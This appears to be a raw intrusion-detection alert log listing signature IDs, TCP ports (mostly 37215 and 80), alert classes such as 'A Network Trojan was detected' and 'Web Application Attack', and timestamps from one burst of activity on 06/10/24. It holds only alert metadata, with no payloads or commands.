              SID:2835222
              Source Port:32782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.255864
              SID:2829579
              Source Port:46904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.946134
              SID:2829579
              Source Port:33492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.917908
              SID:2829579
              Source Port:47136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.933795
              SID:2829579
              Source Port:52838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.221508
              SID:2835222
              Source Port:54140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.017705
              SID:2829579
              Source Port:44662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.692312
              SID:2829579
              Source Port:55186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.850206
              SID:2829579
              Source Port:40532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.866110
              SID:2835222
              Source Port:54502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.709297
              SID:2835222
              Source Port:33708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.260140
              SID:2829579
              Source Port:46142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.933966
              SID:2829579
              Source Port:56460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.986870
              SID:2829579
              Source Port:57044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.857260
              SID:2829579
              Source Port:52206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.808787
              SID:2829579
              Source Port:53890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.019152
              SID:2835222
              Source Port:57320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.022727
              SID:2835222
              Source Port:38164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.208623
              SID:2030092
              Source Port:33738
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.973933
              SID:2829579
              Source Port:60388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.741975
              SID:2835222
              Source Port:53950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.870630
              SID:2829579
              Source Port:56808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.866129
              SID:2030092
              Source Port:52018
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.510425
              SID:2835222
              Source Port:37076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.922975
              SID:2835222
              Source Port:33046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.834263
              SID:2835222
              Source Port:39336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.936119
              SID:2835222
              Source Port:47328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.931967
              SID:2835222
              Source Port:37610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.167024
              SID:2030092
              Source Port:50818
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.237158
              SID:2829579
              Source Port:42124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.238002
              SID:2835222
              Source Port:57242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.189175
              SID:2829579
              Source Port:58464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.162235
              SID:2829579
              Source Port:37698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.179580
              SID:2030092
              Source Port:39528
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.942479
              SID:2829579
              Source Port:55606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.191721
              SID:2835222
              Source Port:48406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.149724
              SID:2030092
              Source Port:41308
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.644982
              SID:2829579
              Source Port:60718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.772200
              SID:2025883
              Source Port:49156
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.160743
              SID:2829579
              Source Port:57854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.964618
              SID:2835222
              Source Port:54370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.999497
              SID:2835222
              Source Port:37368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.212309
              SID:2829579
              Source Port:55900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.239703
              SID:2835222
              Source Port:33930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.195434
              SID:2835222
              Source Port:34518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.504959
              SID:2829579
              Source Port:34860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.029158
              SID:2835222
              Source Port:34938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.260853
              SID:2835222
              Source Port:44940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.017007
              SID:2835222
              Source Port:41972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.689784
              SID:2835222
              Source Port:55340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.236761
              SID:2030092
              Source Port:58072
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.015623
              SID:2835222
              Source Port:40590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.238893
              SID:2030092
              Source Port:46862
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.934919
              SID:2829579
              Source Port:56378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.983452
              SID:2829579
              Source Port:44048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.992068
              SID:2835222
              Source Port:49128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.657284
              SID:2829579
              Source Port:50714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.230283
              SID:2829579
              Source Port:53326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.010670
              SID:2829579
              Source Port:54964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.827129
              SID:2835222
              Source Port:42044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.778188
              SID:2829579
              Source Port:36016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.130177
              SID:2030092
              Source Port:49926
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.193407
              SID:2030092
              Source Port:37466
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.776905
              SID:2835222
              Source Port:46860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.183832
              SID:2829579
              Source Port:50966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.948276
              SID:2829579
              Source Port:46442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.641252
              SID:2835222
              Source Port:47262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.959524
              SID:2829579
              Source Port:47272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.245474
              SID:2835222
              Source Port:43920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.958705
              SID:2835222
              Source Port:44164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.171881
              SID:2829579
              Source Port:37844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.925134
              SID:2829579
              Source Port:60470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.019873
              SID:2835222
              Source Port:41708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.862438
              SID:2835222
              Source Port:57532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.193999
              SID:2835222
              Source Port:43578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.723332
              SID:2835222
              Source Port:47500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.001255
              SID:2835222
              Source Port:37376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.190024
              SID:2829579
              Source Port:46504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.792332
              SID:2829579
              Source Port:51254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.996136
              SID:2829579
              Source Port:60446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.213753
              SID:2030092
              Source Port:41004
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.494045
              SID:2829579
              Source Port:35882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.025563
              SID:2835222
              Source Port:40448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.838365
              SID:2030092
              Source Port:34216
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.862278
              SID:2025883
              Source Port:43590
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.247958
              SID:2030092
              Source Port:52852
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.973058
              SID:2835222
              Source Port:56350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.264600
              SID:2030092
              Source Port:44888
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.501600
              SID:2835222
              Source Port:58548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.802976
              SID:2829579
              Source Port:45606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.928461
              SID:2829579
              Source Port:46424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.775920
              SID:2835222
              Source Port:35870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.020596
              SID:2829579
              Source Port:56620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.216411
              SID:2835222
              Source Port:34482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.162961
              SID:2829579
              Source Port:55306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.024162
              SID:2829579
              Source Port:52364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.821238
              SID:2829579
              Source Port:32890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.933051
              SID:2829579
              Source Port:53100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.003802
              SID:2835222
              Source Port:33756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.842965
              SID:2025883
              Source Port:49276
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.638444
              SID:2829579
              Source Port:40638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.498786
              SID:2829579
              Source Port:47358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.160403
              SID:2030092
              Source Port:59562
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.157918
              SID:2030092
              Source Port:60478
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.822693
              SID:2025883
              Source Port:34326
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.201249
              SID:2835222
              Source Port:56976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.245245
              SID:2030092
              Source Port:56010
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.802263
              SID:2030092
              Source Port:47840
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.218073
              SID:2829579
              Source Port:45262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.869004
              SID:2835222
              Source Port:39244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.244589
              SID:2030092
              Source Port:55226
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.687592
              SID:2835222
              Source Port:56152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.181485
              SID:2835222
              Source Port:48948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.927927
              SID:2829579
              Source Port:41114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.913437
              SID:2829579
              Source Port:59684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.726932
              SID:2835222
              Source Port:34468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.930759
              SID:2835222
              Source Port:33768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.491066
              SID:2835222
              Source Port:47950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.220012
              SID:2030092
              Source Port:44608
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.498091
              SID:2829579
              Source Port:49488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.780766
              SID:2835222
              Source Port:57340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.871854
              SID:2025883
              Source Port:39034
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:37:59.988624
              SID:2835222
              Source Port:51130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.125561
              SID:2030092
              Source Port:33280
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.163693
              SID:2829579
              Source Port:60154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.147216
              SID:2030092
              Source Port:33116
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.223242
              SID:2829579
              Source Port:50042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.691059
              SID:2829579
              Source Port:53244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.035608
              SID:2829579
              Source Port:41890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.836583
              SID:2835222
              Source Port:33064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.093026
              SID:2025883
              Source Port:47666
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.132778
              SID:2835222
              Source Port:40686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.303255
              SID:2030092
              Source Port:52004
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.936837
              SID:2835222
              Source Port:47918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.869779
              SID:2025883
              Source Port:56778
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:37:59.813573
              SID:2030092
              Source Port:55620
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.225841
              SID:2030092
              Source Port:55050
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.228512
              SID:2030092
              Source Port:48208
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.640548
              SID:2835222
              Source Port:52172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.818135
              SID:2025883
              Source Port:40194
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.497343
              SID:2829579
              Source Port:58434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.865201
              SID:2835222
              Source Port:38730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.804504
              SID:2025883
              Source Port:35958
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.252450
              SID:2829579
              Source Port:37234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.253141
              SID:2829579
              Source Port:42484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.248014
              SID:2835222
              Source Port:34566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.717243
              SID:2835222
              Source Port:37456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.804169
              SID:2835222
              Source Port:41386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.829282
              SID:2030092
              Source Port:35066
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.813306
              SID:2829579
              Source Port:50454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.969655
              SID:2835222
              Source Port:49034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.099888
              SID:2030092
              Source Port:50944
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.966319
              SID:2829579
              Source Port:41788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.921767
              SID:2829579
              Source Port:37950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.847523
              SID:2030092
              Source Port:58522
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.732625
              SID:2829579
              Source Port:45998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.713903
              SID:2835222
              Source Port:50702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.223515
              SID:2030092
              Source Port:43716
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.203856
              SID:2030092
              Source Port:55756
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.868091
              SID:2829579
              Source Port:40972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.132169
              SID:2030092
              Source Port:37608
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.012098
              SID:2829579
              Source Port:50268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.178071
              SID:2829579
              Source Port:44078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.768716
              SID:2829579
              Source Port:53660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.874568
              SID:2030092
              Source Port:57824
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.263049
              SID:2829579
              Source Port:57558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.234846
              SID:2030092
              Source Port:33624
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.258036
              SID:2829579
              Source Port:52852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.492497
              SID:2835222
              Source Port:46236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.507632
              SID:2835222
              Source Port:60618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.666292
              SID:2835222
              Source Port:34524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.193307
              SID:2829579
              Source Port:34652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.500887
              SID:2829579
              Source Port:34050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.234498
              SID:2829579
              Source Port:43084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.495196
              SID:2835222
              Source Port:51876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.677116
              SID:2835222
              Source Port:45284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.724796
              SID:2835222
              Source Port:52760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.651590
              SID:2835222
              Source Port:45096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.248692
              SID:2030092
              Source Port:57952
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.137030
              SID:2030092
              Source Port:59546
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.150336
              SID:2030092
              Source Port:56144
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.992906
              SID:2829579
              Source Port:33394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.757283
              SID:2829579
              Source Port:44434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.754766
              SID:2835222
              Source Port:59676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.735960
              SID:2835222
              Source Port:47608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.199023
              SID:2030092
              Source Port:58564
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.769858
              SID:2030092
              Source Port:39338
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.237504
              SID:2030092
              Source Port:40702
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.164438
              SID:2835222
              Source Port:48850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.977354
              SID:2829579
              Source Port:60878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.134301
              SID:2835222
              Source Port:45440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.963760
              SID:2829579
              Source Port:46788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.672216
              SID:2835222
              Source Port:38730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.867470
              SID:2025883
              Source Port:49412
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.876052
              SID:2829579
              Source Port:47002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.952964
              SID:2829579
              Source Port:56508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.994517
              SID:2835222
              Source Port:39806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.186850
              SID:2829579
              Source Port:33396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.785256
              SID:2835222
              Source Port:60856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
